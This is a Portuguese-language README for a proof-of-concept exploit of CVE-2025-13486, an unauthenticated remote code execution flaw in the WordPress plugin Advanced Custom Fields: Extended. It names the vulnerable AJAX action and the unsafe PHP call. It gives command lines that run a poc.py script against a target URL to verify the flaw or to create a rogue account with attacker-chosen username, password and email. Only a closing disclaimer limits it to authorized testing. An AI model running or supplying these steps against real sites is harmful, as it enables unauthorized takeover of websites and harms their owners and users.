
POC para CVE-2025-13486
Uma exploração de Prova de Conceito (PoC) para CVE-2025-13486, uma vulnerabilidade de Execução Remota de Código no plugin WordPress Advanced Custom Fields: Extended (ACFE).
Esta vulnerabilidade existe nas versões 0.9.0.5 a 0.9.1.1 do ACFE, permitindo que atacantes não autenticados executem funções PHP arbitrárias através da ação AJAX acfe/form/render_form_ajax. O plugin usa call_user_func_array() com entrada fornecida pelo usuário sem validação adequada.
print_r (não destrutivo)pip install requests
python poc.py -u http://target-site.com --verify
# With random credentials (displayed after execution)
python poc.py -u http://target-site.com
# With custom credentials
python poc.py -u http://target-site.com --user admin123 --password P@ssw0rd! --email [email protected]
-u, --url URL do WordPress alvo (obrigatório)
--verify Apenas verificar vulnerabilidade (mais seguro, usa print_r)
--user Nome de usuário a criar (padrão: aleatório)
--password Senha a definir (padrão: aleatória)
--email Endereço de email a definir (padrão: aleatório)
Esta PoC é fornecida apenas para fins educacionais e de teste de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. Sempre obtenha a devida autorização antes de testar.